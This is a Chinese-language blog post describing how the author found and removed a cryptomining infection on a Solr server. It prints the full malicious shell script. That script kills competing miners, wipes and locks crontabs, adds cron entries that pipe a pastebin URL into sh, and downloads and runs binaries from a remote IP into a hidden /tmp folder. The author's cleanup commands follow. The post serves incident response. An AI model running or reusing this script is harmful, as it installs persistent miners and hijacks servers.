記一次挖礦病毒solr
阿新 • • 發佈:2022-12-06
1 病毒出現
2 後來發現有個定時任務
3 去網址檢視
4 把這個指令碼拉下來
#!/bin/sh export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 % killall /tmp/* killall /tmp/.* killall /var/tmp/* killall /var/tmp/.* pgrep JavaUpdate | xargs -I % kill -9 % pgrep kinsing | xargs -I % kill -9 % pgrep donate | xargs -I % kill -9 % pgrep kdevtmpfsi | xargs -I % kill -9 % pgrep sysupdate | xargs -I % kill -9 % pgrep mysqlserver | xargs -I % kill -9 % chattr -ia /var/spool/cron/root crontab -r crontab -l | grep -e "xg546sAd" | grep -v grep if [ $? -eq 0 ]; then echo "cron good" else ( crontab -l 2>/dev/null echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | sh" ) | crontab - fi rm -f /tmp/* rm -f /tmp/.sola s2=`whoami` if [ `whoami` = "root" ]; then chattr -ia /etc/cron.d/* rm -rf /etc/cron.d/* chattr -i /var/spool/cron/crontabs/root chattr -i /usr/local/bin/dns rm -f /etc/cron.hourly/oanacroner rm -f /etc/cron.hourly/oanacrona rm -f /etc/cron.daily/oanacroner rm -f /etc/cron.daily/oanacrona rm -f /etc/cron.monthly/oanacroner rm -f /usr/local/bin/dns rm -f /etc/update.sh chattr -ia /etc/hosts echo >/etc/hosts chattr +ia /etc/hosts chattr -i /etc/sysupdate rm -f /etc/sysupdate rm -f /etc/config.json rm -f /var/tmp/kworkerds rm -f /usr/bin/.systemcero rm -f /usr/bin/cloudupdate rm -f /usr/bin/diskmanagerd rm -f /lib/libterminfo.so rm -f /bin/httpsntp rm -f /bin/ftpsntp rm -f /var/tmp/jspserv rm -f /usr/sbin/cron rm -f /usr/bin/kinsing* rm -f /etc/cron.d/kinsing* rm -f /usr/bin/node chattr -isa /var/spool/cron/* rm -rf /var/spool/cron/* chattr +isa /tmp/xms rm -f /var/tmp/kinsing chattr -ia /etc/crontab echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/crontab chattr +ia /etc/crontab chattr -ia /var/spool/cron/root chattr -ia /var/spool/cron/crontabs/root echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/root echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/crontabs/root echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/cron.d/root chattr +ia /var/spool/cron/root chattr +ia /etc/cron.d/root chattr +ia /var/spool/cron/crontabs/root else ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|defunct\|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 % fi chmod +777 /tmp/* pkill networkservice pkill networkser+ pkill watchbog pkill xmrig rm -rf /tmp/.solr mkdir /tmp/.solr p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}') name=""$p if [ -z "$name" ] then pkill solr.sh pkill solrd ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 % rm -rf /tmp/.solr mkdir /tmp/.solr chmod +rwx /tmp/.solr curl -fsSL http://45.144.3.216:10000/starrail/config/config.json -o /tmp/.solr/config.json curl -fsSL http://45.144.3.216:10000/starrail/cbt2zip/setup.exe -o /tmp/.solr/solrd curl -fsSL http://45.144.3.216:10000/solr.sh -o /tmp/.solr/solr.sh curl -fsSL http://45.144.3.216:10000/genshin -o /tmp/.solr/genshin chmod +x /tmp/.solr/genshin chmod +x /tmp/.solr/solrd chmod +x /tmp/.solr/solr.sh nohup /tmp/.solr/solr.sh &>>/dev/null & sleep 10 rm -f /tmp/.solr/solr.sh else exit fi
發現它在系統裡設定了5個定時任務,同時把排程任務檔案改成了可讀,另外在tmp目錄有個隱藏資料夾.solr
5 處理(它是10秒的排程週期,人工一個一個處理的話,很可能人工還沒處理完,另外的排程任務又把前面的定時任務補上了,所以改成指令碼批量處理)
kill -9 11779 kill -9 11773 kill -9 11423 kill -9 11507 kill -9 11508 rm -rf /tmp/.solr chattr -ia /etc/crontab chattr -ia /var/spool/cron/root chattr -ia /var/spool/cron/crontabs/root chattr-ia /etc/cron.d/root chattr -ia /var/spool/cron/root cat /dev/null > /etc/crontab cat /dev/null > /var/spool/cron/root cat /dev/null > /var/spool/cron/crontabs/root cat /dev/null > /etc/cron.d/root cat /dev/null > /var/spool/cron/root chattr +ia /etc/crontab chattr +ia /var/spool/cron/root chattr +ia /var/spool/cron/crontabs/root chattr+ia /etc/cron.d/root chattr +ia /var/spool/cron/root
先把病毒程序程序都kill, 再把宿主資料夾都刪除,再把定時任務的可讀屬性開啟,批量清空,再把可讀屬性加回去,,後續伺服器安全性加強以後再改回去, 另外有別的定時任務記得先儲存